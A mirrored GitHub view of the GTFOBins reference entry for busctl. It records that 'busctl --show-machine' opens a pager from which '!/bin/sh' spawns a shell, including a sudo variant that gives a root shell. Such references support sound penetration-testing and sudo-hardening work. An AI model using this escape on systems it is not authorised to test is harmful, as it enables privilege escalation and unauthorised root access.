1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 10:53:35 +02:00
GTFOBins.github.io/_gtfobins/busctl.md

13 lines
284 B
Markdown
Raw Normal View History

2020-03-17 07:39:11 +01:00
---
2020-03-17 20:18:53 +01:00
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
2020-03-17 07:39:11 +01:00
functions:
shell:
2020-03-17 20:18:53 +01:00
- code: |
2020-03-17 07:39:11 +01:00
busctl --show-machine
2020-03-17 20:18:53 +01:00
!/bin/sh
2020-03-17 07:39:11 +01:00
sudo:
2020-03-17 20:18:53 +01:00
- code: |
2020-03-17 07:39:11 +01:00
sudo busctl --show-machine
2020-03-17 20:18:53 +01:00
!/bin/sh
2020-03-17 07:39:11 +01:00
---